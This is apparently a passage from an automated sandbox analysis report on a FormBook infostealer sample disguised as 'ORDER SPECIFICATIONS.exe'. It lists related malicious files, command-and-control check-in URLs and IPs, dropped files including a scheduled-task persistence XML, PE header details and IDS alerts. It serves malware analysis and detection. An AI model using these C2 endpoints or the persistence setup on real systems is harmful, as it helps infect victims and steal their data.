                                                                                      • www.lovethybodi.com/dll/?Ezrt7H=XrITfbQx&rJET96=VZxax5Ji0ayI+hrvRc8xbN6ADZocsLe3YiHwLknRP/O6fJJXAg3ZXgaLGnTQhcDUXCIi
                                                                                      AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                      • www.sioosi.com/idir/?jFNhC=BAdMNhCaU+7u9XJaCO3iV4C5aA0TCLj07dpBj0L8TrCXQaq7x7/wZRF1tJRJ0mfI3EQomiZFcg==&PlHT0=_6g89p5H3xehg
                                                                                      rad875FE.tmp.exeGet hashmaliciousBrowse
                                                                                      • fdmail85.club/serverstat315/
                                                                                      SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                                                      • www.buyers-connection.com/mt6e/?T8e0dp=hLmMffsGgwjrW5RZdYCH6mddSm2W9hJJfHEwGoyKmHJo5/xZlUyZeqeg++L426DpjyYm&Fx=3fdx_dt
                                                                                      DHL Document. PDF.exeGet hashmaliciousBrowse
                                                                                      • www.thebrowbandit.info/d8ak/?Szr0s4=zH7+TMUEa66ds4LUG5QkV+A8HFZNfwJlYCtch+3uZ/cbqgmlMO3qxYa4o/rgt+cFNwefcp2wvw==&QL3=uTyTqJdh5XE07
                                                                                      eInvoice.exeGet hashmaliciousBrowse
                                                                                      • www.cyberxchange.net/dll/?alI=J6AlYtFHR6r&DxlLi=O16Cpvehw381JgOcsiBVvt6SNBXVOB+15MfeRQ6rIhocO090ZFQOuEsCZWtNgYTmelCy
                                                                                      IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                                      • www.beasley.digital/gypo/?UrjPuprX=M7Hk14MLzXe1S9acHT7ZsieFPBYG9bGpGcbZ4ICPUuDVYKBFzTViR4JE6d+ne5phLrjWAg==&nnLx=UBZp3XKPefjxdB
                                                                                      Outstanding Invoices.pdf.exeGet hashmaliciousBrowse
                                                                                      • www.arescsg.com/ocq1/?Bl=lHLLrF4h72F&ITrHi2v=QNjT++wY9a5zCVAjoE7Ie93o6MHPk5lGE/qlj9tP3aNbcRLbl33t+j0E2POpmVTB9EfC
                                                                                      PDF.exeGet hashmaliciousBrowse
                                                                                      • www.sevendeepsleep.com/ujg4/?Ktz4q=vVYHGFhESmr0MhafV2r1epXRiWHZKHpqHzgNJrSdHWrYUNDGZWFgSG6u51EUVnN8n2QK&tTrL=ApdhXrS
                                                                                      quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                      • www.scanourworld.com/nsag/?ixlp=RjpY/w7V4Gns1L0rMkaS4a7cxyPO11vhmKSgl8HqKcRxVLLhONg71u8j186CVYVfR9NOyw==&3f=7nD434
                                                                                      (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                                                      • www.midnightblueinc.com/2kf/?-ZotnB1=PuGWiF25ErpS8LxGcVT732T32YJ8ljB4Nen33bTYqCA1w1k4pKKXZiLEs+9S++zZpoCcFtK2bw==&2d=oneDfP
                                                                                      RdLlHaxEKP.exeGet hashmaliciousBrowse
                                                                                      • www.royalpetcanvas.com/dyt/?T6AH=NhjxntVXuOKv8VzGSZxWT+wjSfPb58K86TJrQp8bJ11pPHhqBmicI70lfwP4sRyRZd3a&wPT=lf5X
                                                                                      7R29qUuJef.exeGet hashmaliciousBrowse
                                                                                      • www.gdsjgf.com/bw82/?RX=dn9dSBwpLLodPRy&YliL=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXZLtdUJUmSqf
                                                                                      Drawings2.exeGet hashmaliciousBrowse
                                                                                      • www.threebearstoronto.com/e68n/?t8l=FrFLaXJ&OXXTJ=rmAZCyc7Ns5evfiyA1QxM7ECDhDtKxCV7gbVr6Kinm6bQxm9MNnkIGnVyVwusC/d0JpN

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      104.233.225.185.cname-url.comhttp://txfc58.com/wordpress/m2utbn-3ft4c-07947/Get hashmaliciousBrowse
                                                                                      • 23.225.123.149
                                                                                      shops.myshopify.comORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      PO_210222.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      SecuriteInfo.com.Trojan.Inject4.6572.10651.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      PDF.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      D6ui5xr64I.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      Drawings.xlsmGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      Purchase order.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      IMG_7189012.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      q9xB9DE3RA.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      51BfqRtUI9.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      PO copy.pdf.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      RFQ 2-16-2021-.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      NEW ORDER - VOLVO HK HKPO2102-13561,pdf.exeGet hashmaliciousBrowse
                                                                                      • 23.227.38.74
                                                                                      WAFPASSION + PDA_NOTICE.xlsxGet hashmaliciousBrowse
                                                                                      • 23.227.38.74

                                                                                      ASN

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNpo.exeGet hashmaliciousBrowse
                                                                                      • 129.226.58.179
                                                                                      infected.apkGet hashmaliciousBrowse
                                                                                      • 129.226.107.80
                                                                                      infected.apkGet hashmaliciousBrowse
                                                                                      • 129.226.107.80
                                                                                      #U56fd#U5bb6#U961f.vmp.exeGet hashmaliciousBrowse
                                                                                      • 203.205.235.81
                                                                                      KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                                                                      • 119.28.5.87
                                                                                      KROS Sp. z.o.o.exeGet hashmaliciousBrowse
                                                                                      • 119.28.5.87
                                                                                      po.exeGet hashmaliciousBrowse
                                                                                      • 129.226.58.179
                                                                                      M1t8Jk185a.exeGet hashmaliciousBrowse
                                                                                      • 119.28.6.251
                                                                                      Mensaje-22-012021.docGet hashmaliciousBrowse
                                                                                      • 124.156.135.253
                                                                                      certificado.docGet hashmaliciousBrowse
                                                                                      • 101.32.209.55
                                                                                      file.docGet hashmaliciousBrowse
                                                                                      • 124.156.135.253
                                                                                      IFS_1.0.69.apkGet hashmaliciousBrowse
                                                                                      • 129.226.103.217
                                                                                      IFS_1.0.69.apkGet hashmaliciousBrowse
                                                                                      • 129.226.103.12
                                                                                      adware_beauty.apkGet hashmaliciousBrowse
                                                                                      • 129.226.103.217
                                                                                      flashplayerpp_install_cn (1).exeGet hashmaliciousBrowse
                                                                                      • 211.152.136.89
                                                                                      Mv Maersk Kleven V949E_pdf.exeGet hashmaliciousBrowse
                                                                                      • 119.28.17.183
                                                                                      Doc.docGet hashmaliciousBrowse
                                                                                      • 124.156.117.232
                                                                                      JI35907_2020.docGet hashmaliciousBrowse
                                                                                      • 124.156.117.232
                                                                                      DATI 2020.docGet hashmaliciousBrowse
                                                                                      • 124.156.117.232
                                                                                      TZ8322852306TL.docGet hashmaliciousBrowse
                                                                                      • 129.226.14.227
                                                                                      GOOGLEUScrypted.exeGet hashmaliciousBrowse
                                                                                      • 216.239.32.21
                                                                                      NewOrder.xlsmGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      Order_20180218001.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      SOA.exeGet hashmaliciousBrowse
                                                                                      • 35.186.238.101
                                                                                      ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      File Downloader [14.5].apkGet hashmaliciousBrowse
                                                                                      • 142.250.186.74
                                                                                      PO_210222.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      Order83930.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                                                      • 216.239.32.21
                                                                                      GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                                      • 142.250.186.33
                                                                                      DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      xerox for hycite.htmGet hashmaliciousBrowse
                                                                                      • 142.250.186.33
                                                                                      rad875FE.tmp.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                                                      • 34.102.136.180
                                                                                      IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                                                                      • 35.200.172.247
                                                                                      X1(1).xlsmGet hashmaliciousBrowse
                                                                                      • 142.250.186.66
                                                                                      IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                                                      • 35.200.172.247
                                                                                      fedex.apkGet hashmaliciousBrowse
                                                                                      • 142.250.186.138
                                                                                      UNIFIEDLAYER-AS-1USPO-A2174679-06.exeGet hashmaliciousBrowse
                                                                                      • 192.185.78.145
                                                                                      22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                      • 108.167.156.42
                                                                                      CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                                      • 192.185.181.49
                                                                                      PO.exeGet hashmaliciousBrowse
                                                                                      • 192.185.0.218
                                                                                      Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                      • 192.185.16.95
                                                                                      ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                                                                                      • 162.214.158.75
                                                                                      AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                      • 192.185.46.55
                                                                                      iAxkn PDF.exeGet hashmaliciousBrowse
                                                                                      • 192.185.100.181
                                                                                      carta de pago pdf.exeGet hashmaliciousBrowse
                                                                                      • 192.185.5.166
                                                                                      PO.exeGet hashmaliciousBrowse
                                                                                      • 108.179.232.42
                                                                                      payment details.pdf.exeGet hashmaliciousBrowse
                                                                                      • 50.87.95.32
                                                                                      new order.exeGet hashmaliciousBrowse
                                                                                      • 108.179.232.42
                                                                                      CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                                                                                      • 192.185.181.49
                                                                                      RdLlHaxEKP.exeGet hashmaliciousBrowse
                                                                                      • 162.214.184.71
                                                                                      Drawings2.exeGet hashmaliciousBrowse
                                                                                      • 198.57.247.220
                                                                                      EFT Remittance.xlsGet hashmaliciousBrowse
                                                                                      • 162.241.120.180
                                                                                      Remittance Advice.xlsGet hashmaliciousBrowse
                                                                                      • 162.241.120.180
                                                                                      Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                                                                                      • 192.185.17.119
                                                                                      Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                                                                                      • 192.185.17.119
                                                                                      SecuriteInfo.com.BehavesLike.Win32.Generic.ch.exeGet hashmaliciousBrowse
                                                                                      • 162.241.194.14

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER SPECIFICATIONS.exe.log
                                                                                      Process:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):1314
                                                                                      Entropy (8bit):5.350128552078965
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                      Malicious:true
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                      C:\Users\user\AppData\Local\Temp\tmpDA15.tmp
                                                                                      Process:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1644
                                                                                      Entropy (8bit):5.1713595838000685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBbtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3D
                                                                                      MD5:655B601E240FE8E0C83DABE6037B8A13
                                                                                      SHA1:A80DA09FA0A2141145E2BB0A55CD0BE796BCC7A1
                                                                                      SHA-256:8410B13023E7E02C7A196F7104F913C19E8D99E2FE7220CD85AA496D15C0BE85
                                                                                      SHA-512:3C4DAE9D022AEFC9354E595A020CBD0E5D938493A2BAA3B7A871B515674F68EA0A6BB634692F2926FD132EC8AB22BB3B867F11F9231EFFD5ED6C0E45CFB22F81
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                                                      C:\Users\user\AppData\Roaming\LvZiFDk.exe
                                                                                      Process:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):552448
                                                                                      Entropy (8bit):7.441638759834839
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:EkPa0YM/0rvX7/ozV2peyq6nnQHyCfGofwabvIZy:Dascr2wQv0oB4ab0y
                                                                                      MD5:E75A4DF51162401B21C3EB79718FB3DB
                                                                                      SHA1:3328EAD22DB03CE461CB8BDB5D59638120E2444F
                                                                                      SHA-256:48709C3E07C128283D9D550331D6E5F7C4AFEADFC61CAD94D769EA8CE7399E77
                                                                                      SHA-512:316D9088ACABC1BC7FA003BF0E5D8F03E96F8242441B264984E317126DBFA2745DB557338D34D96CEFB18228D00E1B28126D066FD06A810F7B8F485932D23307
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 15%
                                                                                      Reputation:low
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kM4`..............P..P...........o... ........@.. ....................................@..................................o..O.................................................................................... ............... ..H............text....O... ...P.................. ..`.rsrc................R..............@..@.reloc...............l..............@..B.................o......H........x...S..........................................................0............(....(..........(.....o ....*.....................(!......("......(#......($......(%....*N..(....o....(&....*&..('....*.s(........s)........s*........s+........s,........*....0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+..*.0......
                                                                                      C:\Users\user\AppData\Roaming\LvZiFDk.exe:Zone.Identifier
                                                                                      Process:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: [ZoneTransfer]....ZoneId=0

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.441638759834839
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:ORDER SPECIFICATIONS.exe
                                                                                      File size:552448
                                                                                      MD5:e75a4df51162401b21c3eb79718fb3db
                                                                                      SHA1:3328ead22db03ce461cb8bdb5d59638120e2444f
                                                                                      SHA256:48709c3e07c128283d9d550331d6e5f7c4afeadfc61cad94d769ea8ce7399e77
                                                                                      SHA512:316d9088acabc1bc7fa003bf0e5d8f03e96f8242441b264984e317126dbfa2745db557338d34d96cefb18228d00e1b28126d066fd06a810f7b8f485932d23307
                                                                                      SSDEEP:12288:EkPa0YM/0rvX7/ozV2peyq6nnQHyCfGofwabvIZy:Dascr2wQv0oB4ab0y
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kM4`..............P..P...........o... ........@.. ....................................@................................

                                                                                      File Icon

                                                                                      Icon Hash:0563734bfff3e3a1

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x476fee
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x60344D6B [Tue Feb 23 00:33:47 2021 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x76f9c0x4f.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000x118a0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x74ff40x75000False0.752839960604data7.43400315564IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x780000x118a00x11a00False0.445187832447data5.81195077759IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x8a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_ICON0x781300x10828data
                                                                                      RT_GROUP_ICON0x889580x14data
                                                                                      RT_VERSION0x8896c0x324data
                                                                                      RT_MANIFEST0x88c900xc0fXML 1.0 document, UTF-8 Unicode (with BOM) text

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Version Infos

                                                                                      DescriptionData
                                                                                      Translation0x0000 0x04b0
                                                                                      LegalCopyrightCopyright 2018
                                                                                      Assembly Version1.0.0.0
                                                                                      InternalNameObjectMap.exe
                                                                                      FileVersion1.0.0.0
                                                                                      CompanyName
                                                                                      LegalTrademarks
                                                                                      Comments
                                                                                      ProductNameRegisterVB
                                                                                      ProductVersion1.0.0.0
                                                                                      FileDescriptionRegisterVB
                                                                                      OriginalFilenameObjectMap.exe

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      02/23/21-08:57:55.635872TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.534.102.136.180
                                                                                      02/23/21-08:57:55.635872TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.534.102.136.180
                                                                                      02/23/21-08:57:55.635872TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.534.102.136.180
                                                                                      02/23/21-08:57:55.775060TCP1201ATTACK-RESPONSES 403 Forbidden804973134.102.136.180192.168.2.5
                                                                                      02/23/21-08:58:17.613406TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.534.90.54.238
                                                                                      02/23/21-08:58:17.613406TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.534.90.54.238
                                                                                      02/23/21-08:58:17.613406TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.534.90.54.238
                                                                                      02/23/21-08:58:22.815170TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.534.102.136.180
                                                                                      02/23/21-08:58:22.815170TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.534.102.136.180
                                                                                      02/23/21-08:58:22.815170TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.534.102.136.180
                                                                                      02/23/21-08:58:22.954350TCP1201ATTACK-RESPONSES 403 Forbidden804973734.102.136.180192.168.2.5
                                                                                      02/23/21-08:58:59.639218TCP1201ATTACK-RESPONSES 403 Forbidden804974023.227.38.74192.168.2.5

                                                                                      Network Port Distribution

